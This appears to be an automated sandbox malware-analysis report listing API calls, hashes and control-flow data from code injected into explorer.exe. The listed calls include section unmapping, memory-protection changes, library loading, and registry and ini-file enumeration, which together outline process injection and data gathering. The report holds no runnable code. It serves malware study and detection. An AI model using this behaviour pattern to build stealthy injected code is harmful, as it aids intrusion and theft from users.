                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: %$-x0$NaN
                                                                                                        • API String ID: 0-62881354
                                                                                                        • Opcode ID: b6c7e2fe1b33ad7f6cf197b29fe2274f5a1b374ec748cf3a8cc2f422461a929d
                                                                                                        • Instruction ID: 630b2494556ed739a6cefdbed33539f4c0c1a68d010ac1f839aab41ca20ea718
                                                                                                        • Opcode Fuzzy Hash: b6c7e2fe1b33ad7f6cf197b29fe2274f5a1b374ec748cf3a8cc2f422461a929d
                                                                                                        • Instruction Fuzzy Hash: 62D1243060E3828FD765CE28849076EFBE5AFCAA84F18499DEAC187B41D665C945C783
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: -x0$NaN
                                                                                                        • API String ID: 0-3447725786
                                                                                                        • Opcode ID: 229d433f66754a9b50c0a2a17dafbfa01ac088a981050e8fb6b8b8826505152c
                                                                                                        • Instruction ID: 37876c08e51d60e2b96582c1156c70346f6aa60a82101e448b53269dc2517638
                                                                                                        • Opcode Fuzzy Hash: 229d433f66754a9b50c0a2a17dafbfa01ac088a981050e8fb6b8b8826505152c
                                                                                                        • Instruction Fuzzy Hash: 61E14530A0E3828FD765CE28845076FFBE5AFCAA84F1C499DEAC187B41D665C945C783
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: -x0$NaN
                                                                                                        • API String ID: 0-3447725786
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: -x0$NaN
                                                                                                        • API String ID: 0-3447725786
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: -x0$NaN
                                                                                                        • API String ID: 0-3447725786
                                                                                                        APIs
                                                                                                        • _aulldvrm.NTDLL(00000000,00000002,0000000A,00000000), ref: 030F720E
                                                                                                        • _aullrem.NTDLL(00000000,?,0000000A,00000000), ref: 030F7226
                                                                                                        • _aulldvrm.NTDLL(00000000,00000000,?), ref: 030F727B
                                                                                                        Similarity
                                                                                                        • API ID: _aulldvrm$_aullrem
                                                                                                        • String ID: -x0$NaN
                                                                                                        • API String ID: 105165338-3447725786
                                                                                                        APIs
                                                                                                        • _allmul.NTDLL(00000000,?,0000000A,00000000), ref: 030F8AAD
                                                                                                        • _allmul.NTDLL(?,?,0000000A,00000000), ref: 030F8B66
                                                                                                        • _allmul.NTDLL(?,00000000,0000000A,00000000), ref: 030F8C9B
                                                                                                        • _alldvrm.NTDLL(?,00000000,0000000A,00000000), ref: 030F8CAE
                                                                                                        Similarity
                                                                                                        • API ID: _allmul$_alldvrm
                                                                                                        • String ID: .
                                                                                                        • API String ID: 115548886-248832578
                                                                                                        Similarity
                                                                                                        • API ID: memset
                                                                                                        • String ID: ,$7$9
                                                                                                        • API String ID: 2221118986-1653249994
                                                                                                        APIs
                                                                                                        • lstrlenW.KERNEL32(00000000,00000000,?,030F2E75,PathToExe,00000000,00000000), ref: 030F1BCC
                                                                                                        • StrStrIW.SHLWAPI(00000000,.exe,?,030F2E75,PathToExe,00000000,00000000), ref: 030F1BF0
                                                                                                        • StrRChrIW.SHLWAPI(00000000,00000000,0000005C,?,030F2E75,PathToExe,00000000,00000000), ref: 030F1C05
                                                                                                        • lstrlenW.KERNEL32(00000000,?,030F2E75,PathToExe,00000000,00000000), ref: 030F1C1C
                                                                                                        Similarity
                                                                                                        • API ID: lstrlen
                                                                                                        • String ID: .exe
                                                                                                        • API String ID: 1659193697-4119554291
                                                                                                        APIs
                                                                                                          • Part of subcall function 030F1000: GetProcessHeap.KERNEL32(00000008,?,030F11C7,?,?,00000001,00000000,?), ref: 030F1003
                                                                                                          • Part of subcall function 030F1000: RtlAllocateHeap.NTDLL(00000000), ref: 030F100A
                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?), ref: 030F2127
                                                                                                        • _alldiv.NTDLL(?,?,00989680,00000000), ref: 030F213A
                                                                                                        • wsprintfA.USER32 ref: 030F214F
                                                                                                        Similarity
                                                                                                        • API ID: HeapTime$AllocateFileProcessSystem_alldivwsprintf
                                                                                                        • String ID: %li
                                                                                                        • API String ID: 4120667308-1021419598
                                                                                                        APIs
                                                                                                        • _allmul.NTDLL(?,00000000,00000018), ref: 0310316F
                                                                                                        • _allmul.NTDLL(-00000001,00000000,?,?), ref: 031031D2
                                                                                                        • _alldiv.NTDLL(?,?,00000000), ref: 031032DE
                                                                                                        • _allmul.NTDLL(00000000,?,00000000), ref: 031032E7
                                                                                                        • _allmul.NTDLL(?,00000000,?,?), ref: 03103392
                                                                                                          • Part of subcall function 031016CD: memset.NTDLL ref: 0310172B
                                                                                                        Similarity
                                                                                                        • API ID: _allmul$_alldivmemset
                                                                                                        • String ID:
                                                                                                        • API String ID: 3880648599-0
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: FOREIGN KEY constraint failed$new$old
                                                                                                        • API String ID: 0-384346570
                                                                                                        APIs
                                                                                                        • _alldiv.NTDLL(000000FF,7FFFFFFF,?,?), ref: 030F96E7
                                                                                                        • _alldiv.NTDLL(00000000,80000000,?,?), ref: 030F9707
                                                                                                        • _alldiv.NTDLL(00000000,80000000,?,?), ref: 030F9739
                                                                                                        • _alldiv.NTDLL(00000001,80000000,?,?), ref: 030F976C
                                                                                                        • _allmul.NTDLL(?,?,?,?), ref: 030F9798
                                                                                                        Similarity
                                                                                                        • API ID: _alldiv$_allmul
                                                                                                        • String ID:
                                                                                                        • API String ID: 4215241517-0
                                                                                                        APIs
                                                                                                        • _allmul.NTDLL(?,00000000,00000000), ref: 0310B1B3
                                                                                                        • _alldvrm.NTDLL(?,?,00000000), ref: 0310B20F
                                                                                                        • _allrem.NTDLL(?,00000000,?,?), ref: 0310B28A
                                                                                                        • memcpy.NTDLL(?,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,00000000), ref: 0310B298
                                                                                                        Similarity
                                                                                                        • API ID: _alldvrm_allmul_allremmemcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 1484705121-0
                                                                                                        APIs
                                                                                                        • GetHGlobalFromStream.COMBASE(?,?), ref: 030F18A7
                                                                                                        • GlobalLock.KERNEL32(030F4B57), ref: 030F18B6
                                                                                                        • GlobalUnlock.KERNEL32(?), ref: 030F18F4
                                                                                                          • Part of subcall function 030F1000: GetProcessHeap.KERNEL32(00000008,?,030F11C7,?,?,00000001,00000000,?), ref: 030F1003
                                                                                                          • Part of subcall function 030F1000: RtlAllocateHeap.NTDLL(00000000), ref: 030F100A
                                                                                                        • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 030F18E8
                                                                                                        Similarity
                                                                                                        • API ID: Global$Heap$AllocateFromLockMemoryMoveProcessStreamUnlock
                                                                                                        • String ID:
                                                                                                        • API String ID: 1688112647-0
                                                                                                        APIs
                                                                                                        • lstrlenW.KERNEL32(?,00000000,00000000,?,?,030F2F0C), ref: 030F1973
                                                                                                        • lstrlenW.KERNEL32(03146564,?,?,030F2F0C), ref: 030F1978
                                                                                                        • lstrcatW.KERNEL32(00000000,?,?,?,030F2F0C), ref: 030F1990
                                                                                                        • lstrcatW.KERNEL32(00000000,03146564,?,?,030F2F0C), ref: 030F1994
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: lstrcatlstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 1475610065-0
                                                                                                        • Opcode ID: d4982b0fedacb0968a10ae810ccc6fd45e7bebad1663e127f3a1e3434708dfeb
                                                                                                        • Instruction ID: b6087aded0b1e5d243c45be7a33f4a971ccca536fa2bc1a56a8725a13960c26a
                                                                                                        • Opcode Fuzzy Hash: d4982b0fedacb0968a10ae810ccc6fd45e7bebad1663e127f3a1e3434708dfeb
                                                                                                        • Instruction Fuzzy Hash: 95E065A630521C5F8718B6AE5C94D7B76DCCACD5A53090079FB09D3205FB569C0546F0
                                                                                                        APIs
                                                                                                          • Part of subcall function 030F6A81: memset.NTDLL ref: 030F6A9C
                                                                                                        • _aulldiv.NTDLL(?,00000000,?,00000000), ref: 0311F2A1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _aulldivmemset
                                                                                                        • String ID: %llu$%llu
                                                                                                        • API String ID: 714058258-4283164361
                                                                                                        • Opcode ID: 88433cdb8012bdf03943d841dcaef5d6abeba7de99f84315994e2d1b90246861
                                                                                                        • Instruction ID: 37ff861c73e6809a3a608cc692b6fe8ce9926657369e66b37f501fadc7e9e572
                                                                                                        • Opcode Fuzzy Hash: 88433cdb8012bdf03943d841dcaef5d6abeba7de99f84315994e2d1b90246861
                                                                                                        • Instruction Fuzzy Hash: 9E21D4B66403056FC610EA64CC41FAFB769AF89730F044328FA219B6C0DB21DC2686E1
                                                                                                        APIs
                                                                                                        • _allmul.NTDLL(?,00000000,?), ref: 03102174
                                                                                                        • _allmul.NTDLL(?,?,?,00000000), ref: 0310220E
                                                                                                        • _allmul.NTDLL(?,00000000,00000000,?), ref: 03102241
                                                                                                        • _allmul.NTDLL(030F2E26,00000000,?,?), ref: 03102295
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _allmul
                                                                                                        • String ID:
                                                                                                        • API String ID: 4029198491-0
                                                                                                        • Opcode ID: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
                                                                                                        • Instruction ID: 4b6fe27fe4036bdb092d24d4991674e9d30c714a4926965420b48dd7faaa4225
                                                                                                        • Opcode Fuzzy Hash: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
                                                                                                        • Instruction Fuzzy Hash: ADA18B747087059FC714EEA4C894A2EB7EAAFCC704F444C2DF6558B290EBB1EC468B42
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpymemset
                                                                                                        • String ID:
                                                                                                        • API String ID: 1297977491-0
                                                                                                        • Opcode ID: eaff050aa4eac8f2408cedc3c65164600f6ffa913653a6c1a289204721c2930e
                                                                                                        • Instruction ID: a4eaff962fefa50fee9212452793f19d70e83d5588426507adea61240fb60abc
                                                                                                        • Opcode Fuzzy Hash: eaff050aa4eac8f2408cedc3c65164600f6ffa913653a6c1a289204721c2930e
                                                                                                        • Instruction Fuzzy Hash: B68180756083149FC354EF29C880A2BBBE5FF8C614F09496DF8CA9B291D7B0E944CB91
                                                                                                        APIs
                                                                                                        • lstrlen.KERNEL32(?,?,?,?,00000000,030F2783), ref: 030F192B
                                                                                                        • lstrlen.KERNEL32(00000000,?,?,?,00000000,030F2783), ref: 030F1930
                                                                                                        • lstrcat.KERNEL32(00000000,?), ref: 030F1946
                                                                                                        • lstrcat.KERNEL32(00000000,00000000), ref: 030F194A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: lstrcatlstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 1475610065-0
                                                                                                        • Opcode ID: d8577aba4ba9fdd4c47df673f5e8d48931c0446900ef85619bfa19fc2473da5b
                                                                                                        • Instruction ID: ba73c824ddac268f8083d0d6f2cae6dcf6bcd33d05f5a0b808aaef42c2716c50
                                                                                                        • Opcode Fuzzy Hash: d8577aba4ba9fdd4c47df673f5e8d48931c0446900ef85619bfa19fc2473da5b
                                                                                                        • Instruction Fuzzy Hash: 1DE09BA630525C6F4624B6AE5C84D7B76DCCACD4A53090175FA05D3205EF569C0146F0

Execution Graph

Execution Coverage: 21.7%
Dynamic/Decrypted Code Coverage: 86.8%
Signature Coverage: 0%
Total number of Nodes: 182
Total number of Limit Nodes: 17

Callgraph

• Executed
• Not Executed
• Opacity -> Relevance
• Disassembly available

Control-flow Graph

• Executed
• Not Executed
APIs
Memory Dump Source
• Source File: 0000000D.00000002.2670899229.00000000003C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003C1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_3c1000_explorer.jbxd
Similarity
• API ID: Find$File$CloseFirstNext
• String ID:
• API String ID: 3541575487-0
• Opcode ID: 1d486c4d822fa2842588a2a5b257e154b5955fe3e65b36dc891d1a63625ddf83
• Instruction ID: 4ec66c56d9503b2d86d15db3a28e20a3f2c0276f556451b89981f72dbc79b463
• Opcode Fuzzy Hash: 1d486c4d822fa2842588a2a5b257e154b5955fe3e65b36dc891d1a63625ddf83
• Instruction Fuzzy Hash: D9414E31318B4C4FDB96FB289899BAB76D2FBD8340F448A2DA44AC7251EE74DD048781

Control-flow Graph

• Executed
• Not Executed
APIs
• NtUnmapViewOfSection.NTDLL ref: 003C38F2
Memory Dump Source
• Source File: 0000000D.00000002.2670899229.00000000003C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003C1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_3c1000_explorer.jbxd
Similarity
• API ID: SectionUnmapView
• String ID:
• API String ID: 498011366-0
• Opcode ID: 3effbf976d711b6f0a270e8bac9098164ff64bae19101d68ee38af86237bc783
• Instruction ID: a165544b0287e9e96878b1e8a1011961125619e3f2542fd40a412db9c75e0e3a
• Opcode Fuzzy Hash: 3effbf976d711b6f0a270e8bac9098164ff64bae19101d68ee38af86237bc783
• Instruction Fuzzy Hash: 91F0E520F11B080BEF6D77BD685D73832D0EB59310F90852DB519CB2D2DD398E498302

Control-flow Graph

APIs
• RegOpenKeyExW.KERNELBASE ref: 003C27C7
• RegQueryValueExW.KERNELBASE ref: 003C27F4
• RegQueryValueExW.KERNELBASE ref: 003C283A
• RegCloseKey.KERNELBASE ref: 003C2860
  • Part of subcall function 003C1860: RtlFreeHeap.NTDLL ref: 003C1880
Memory Dump Source
• Source File: 0000000D.00000002.2670899229.00000000003C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003C1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_3c1000_explorer.jbxd
Similarity
• API ID: QueryValue$CloseFreeHeapOpen
• String ID:
• API String ID: 1641618270-0
• Opcode ID: 9230968f98c31981e9a295993d042543a9bd8a1a5e48c502c57164f1c8228ab1
• Instruction ID: 68a4966c2a37c3e435b7fa76e6fbaf7f06345f814b7384f47d6ac19ef80bc0f6
• Opcode Fuzzy Hash: 9230968f98c31981e9a295993d042543a9bd8a1a5e48c502c57164f1c8228ab1
• Instruction Fuzzy Hash: F531A73020CB488FE76AEB29D498B7B77D0FBA8355F55062EE48AC2265DF34CC458742

Control-flow Graph

• Executed
• Not Executed
APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2670899229.00000000003C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003C1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_3c1000_explorer.jbxd
Similarity
• API ID: CloseCreate
• String ID: ?
• API String ID: 2932200918-1684325040
• Opcode ID: 857738d7a85a5e3c817c71693e64eb2082b10df52a007d4c7754adbbf86b2b9f
• Instruction ID: c6e9aad6742eec22bfa4e675b87a3262b69cfd09f8c4d020de14bf5e1263c5d6
• Opcode Fuzzy Hash: 857738d7a85a5e3c817c71693e64eb2082b10df52a007d4c7754adbbf86b2b9f
• Instruction Fuzzy Hash: 3B119070618B4C8FD751DF29D48876AB7E1FB98305F40062EE48AC3221DF38D985CB82

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 31 3ca298-3ca29b 32 3ca2a5-3ca2a9 31->32 33 3ca2ab-3ca2b3 32->33 34 3ca2b5 32->34 33->34 35 3ca29d-3ca2a3 34->35 36 3ca2b7 34->36 35->32 37 3ca2ba-3ca2c1 36->37 39 3ca2cd 37->39 40 3ca2c3-3ca2cb 37->40 39->37 41 3ca2cf-3ca2d2 39->41 40->39 42 3ca2d4-3ca2e2 41->42 43 3ca2e7-3ca2f4 41->43 44 3ca31e-3ca339 42->44 45 3ca2e4-3ca2e5 42->45 53 3ca30e-3ca31c call 3ca25a 43->53 54 3ca2f6-3ca2f8 43->54 47 3ca36a-3ca36d 44->47 45->43 48 3ca36f-3ca370 47->48 49 3ca372-3ca379 47->49 51 3ca351-3ca355 48->51 52 3ca37f-3ca383 49->52 55 3ca33b-3ca33e 51->55 56 3ca357-3ca35a 51->56 57 3ca385-3ca39e LoadLibraryA 52->57 58 3ca3e0-3ca3e9 52->58 53->32 59 3ca2fb-3ca302 54->59 55->49 64 3ca340 55->64 56->49 60 3ca35c-3ca360 56->60 63 3ca39f-3ca3a6 57->63 61 3ca3ec-3ca3f5 58->61 79 3ca30c 59->79 80 3ca304-3ca30a 59->80 65 3ca341-3ca345 60->65 66 3ca362-3ca369 60->66 67 3ca41a-3ca46a VirtualProtect * 2 61->67 68 3ca3f7-3ca3f9 61->68 63->52 70 3ca3a8 63->70 64->65 65->51 71 3ca347-3ca349 65->71 66->47 75 3ca46e-3ca473 67->75 73 3ca40c-3ca418 68->73 74 3ca3fb-3ca40a 68->74 76 3ca3aa-3ca3b2 70->76 77 3ca3b4-3ca3bc 70->77 71->51 78 3ca34b-3ca34f 71->78 73->74 74->61 75->75 81 3ca475-3ca484 75->81 82 3ca3be-3ca3ca 76->82 77->82 78->51 78->56 79->53 79->59 80->79 85 3ca3cc-3ca3d3 82->85 86 3ca3d5-3ca3df 82->86 85->63
                                                                                                        APIs
                                                                                                        • LoadLibraryA.KERNELBASE ref: 003CA397
                                                                                                        • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 003CA441
                                                                                                        • VirtualProtect.KERNELBASE ref: 003CA45F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.2670899229.00000000003C9000.00000040.80000000.00040000.00000000.sdmp, Offset: 003C9000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_3c9000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ProtectVirtual$LibraryLoad
                                                                                                        • String ID:
                                                                                                        • API String ID: 895956442-0
                                                                                                        • Opcode ID: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
                                                                                                        • Instruction ID: 78b186e72f95afb549928c4e93b5a8873a96b521806b7ad71ef0f70e21ac9e94
                                                                                                        • Opcode Fuzzy Hash: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
                                                                                                        • Instruction Fuzzy Hash: 6F51AD32368D5D4BCB26AB7C9CD4BF4B3D1F759329B180A2EC08AC3284D959DC468383

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 87 3c3254-3c3287 call 3c298c 90 3c328d-3c3297 call 3c298c 87->90 91 3c343a-3c3456 87->91 90->91 94 3c329d-3c32aa call 3c272c 90->94 97 3c32ac-3c32b3 94->97 98 3c32b5 94->98 99 3c32b7-3c32c2 call 3c2688 97->99 98->99 102 3c342c-3c3435 call 3c30a8 99->102 103 3c32c8-3c32fe call 3c2688 call 3c1838 * 2 call 3c2938 99->103 102->91 113 3c340c-3c3427 call 3c1860 * 4 103->113 114 3c3304-3c3318 GetPrivateProfileSectionNamesW 103->114 113->102 114->113 115 3c331e-3c3326 114->115 115->113 117 3c332c-3c332f 115->117 117->113 119 3c3335-3c3348 117->119 124 3c334e-3c3377 GetPrivateProfileStringW 119->124 125 3c33f0-3c3406 119->125 124->125 127 3c3379-3c3398 GetPrivateProfileIntW 124->127 125->113 125->117 130 3c339a-3c33ad call 3c2688 127->130 131 3c33e5-3c33eb call 3c30a8 127->131 135 3c33af-3c33b3 130->135 136 3c33c6-3c33e3 call 3c30a8 call 3c1860 130->136 131->125 137 3c33bd-3c33c4 135->137 138 3c33b5-3c33ba 135->138 136->125 137->135 137->136 138->137
                                                                                                        APIs
                                                                                                          • Part of subcall function 003C298C: GetFileAttributesW.KERNELBASE ref: 003C299E
                                                                                                        • GetPrivateProfileSectionNamesW.KERNEL32 ref: 003C330F
                                                                                                        • GetPrivateProfileStringW.KERNEL32 ref: 003C336F
                                                                                                        • GetPrivateProfileIntW.KERNEL32 ref: 003C338C
                                                                                                          • Part of subcall function 003C30A8: FindFirstFileW.KERNELBASE ref: 003C3104
                                                                                                          • Part of subcall function 003C1860: RtlFreeHeap.NTDLL ref: 003C1880
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.2670899229.00000000003C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003C1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_3c1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: PrivateProfile$File$AttributesFindFirstFreeHeapNamesSectionString
                                                                                                        • String ID:
                                                                                                        • API String ID: 970345848-0
                                                                                                        • Opcode ID: 2b93d8c4a12b134edfd1353bbe2ba01486881703c9a40a6279b7507c54960219
                                                                                                        • Instruction ID: 095e211b7fdd89d24ba50e8bf211e9338c3d158f7659586b130103e33c683cc8
                                                                                                        • Opcode Fuzzy Hash: 2b93d8c4a12b134edfd1353bbe2ba01486881703c9a40a6279b7507c54960219
                                                                                                        • Instruction Fuzzy Hash: D251E830718F0D4FDB5EBB2D9816F7932D2EB98300B45456DE40AC7292EE64DD468386

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • StrStrIW.KERNELBASE ref: 003C347E
                                                                                                        • RegOpenKeyExW.KERNELBASE ref: 003C353F
                                                                                                        • RegEnumKeyExW.KERNELBASE ref: 003C35D6
                                                                                                          • Part of subcall function 003C2774: RegOpenKeyExW.KERNELBASE ref: 003C27C7
                                                                                                          • Part of subcall function 003C2774: RegQueryValueExW.KERNELBASE ref: 003C27F4
                                                                                                          • Part of subcall function 003C2774: RegQueryValueExW.KERNELBASE ref: 003C283A
                                                                                                          • Part of subcall function 003C2774: RegCloseKey.KERNELBASE ref: 003C2860
                                                                                                          • Part of subcall function 003C3254: GetPrivateProfileSectionNamesW.KERNEL32 ref: 003C330F
                                                                                                          • Part of subcall function 003C1860: RtlFreeHeap.NTDLL ref: 003C1880
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.2670899229.00000000003C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003C1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_3c1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: OpenQueryValue$CloseEnumFreeHeapNamesPrivateProfileSection
                                                                                                        • String ID:
                                                                                                        • API String ID: 1841478724-0
                                                                                                        • Opcode ID: 64400a878c992fa71e856e46df4fac4649fc2a7aa652cbc33b09ef089e85c32b
                                                                                                        • Instruction ID: 57d02b946627feab4c883a59cf4209656059d540c4d1843b3a632c8ebaee37e0
                                                                                                        • Opcode Fuzzy Hash: 64400a878c992fa71e856e46df4fac4649fc2a7aa652cbc33b09ef089e85c32b
                                                                                                        • Instruction Fuzzy Hash: 72415B30718F0C4FDB99EF6D8499B2AB6E2FB99341F40456EA54EC3262DE34DD448782

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 232 3c2938-3c2943 233 3c2984 232->233 234 3c2945-3c2948 232->234 236 3c2986-3c298b 233->236 234->233 235 3c294a-3c2970 CreateFileW 234->235 237 3c2980-3c2982 235->237 238 3c2972-3c297a CloseHandle 235->238 237->236 238->237
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.2670899229.00000000003C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003C1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_3c1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseCreateFileHandle
                                                                                                        • String ID:
                                                                                                        • API String ID: 3498533004-0
                                                                                                        • Opcode ID: c2797be9488e4e6f5c36404d807aecabd0db32494513c6dc611a488961ed8fb4
                                                                                                        • Instruction ID: d45f4556bc98dee0a5c65bd542ad89576d3fb17844e482f09bd4e9493782d882
                                                                                                        • Opcode Fuzzy Hash: c2797be9488e4e6f5c36404d807aecabd0db32494513c6dc611a488961ed8fb4
                                                                                                        • Instruction Fuzzy Hash: 5AF02B7121570A4FE7456FB84498737B6D0FB08315F18473DE85AC22D0DB748C528702

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 251 3c22b4-3c22c6 252 3c22c8-3c22d0 CreateStreamOnHGlobal 251->252 253 3c22d6-3c22e6 251->253 252->253
                                                                                                        APIs
                                                                                                        • CreateStreamOnHGlobal.COMBASE ref: 003C22D0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.2670899229.00000000003C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003C1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_3c1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateGlobalStream
                                                                                                        • String ID:
                                                                                                        • API String ID: 2244384528-0
                                                                                                        • Opcode ID: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
                                                                                                        • Instruction ID: 321a2a249cccc43946f344bea037f32e8441d9324d045b9b7548199cb4b5b631
                                                                                                        • Opcode Fuzzy Hash: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
                                                                                                        • Instruction Fuzzy Hash: 00E0C230108B0A8FD798AFBCE4CA57A33A1FB9C252B05093FE005CB114D2798CC1C741

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 254 3c298c-3c2997 255 3c2999-3c299c 254->255 256 3c29b5 254->256 255->256 257 3c299e-3c29a7 GetFileAttributesW 255->257 258 3c29b7-3c29bc 256->258 259 3c29a9-3c29af 257->259 260 3c29b1-3c29b3 257->260 259->260 260->258
                                                                                                        APIs
                                                                                                        • GetFileAttributesW.KERNELBASE ref: 003C299E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.2670899229.00000000003C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003C1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_3c1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AttributesFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 3188754299-0
                                                                                                        • Opcode ID: adac2ff7f887c72d82cf14b017212d62fc95523d70b35a7e56ac7f1322cd4b31
                                                                                                        • Instruction ID: ddfb727e897995a23b707625c96e44b56998bb885c9885506603d286f9be1c1b
                                                                                                        • Opcode Fuzzy Hash: adac2ff7f887c72d82cf14b017212d62fc95523d70b35a7e56ac7f1322cd4b31
                                                                                                        • Instruction Fuzzy Hash: A9D05E22612905076B7626F908D977220A4D71932AB15022EFA36C11A0EBA5CCA5A301

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 261 3c1860-3c1870 call 3c1ad4 264 3c1886-3c188b 261->264 265 3c1872-3c1880 RtlFreeHeap 261->265 265->264
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.2670899229.00000000003C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003C1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
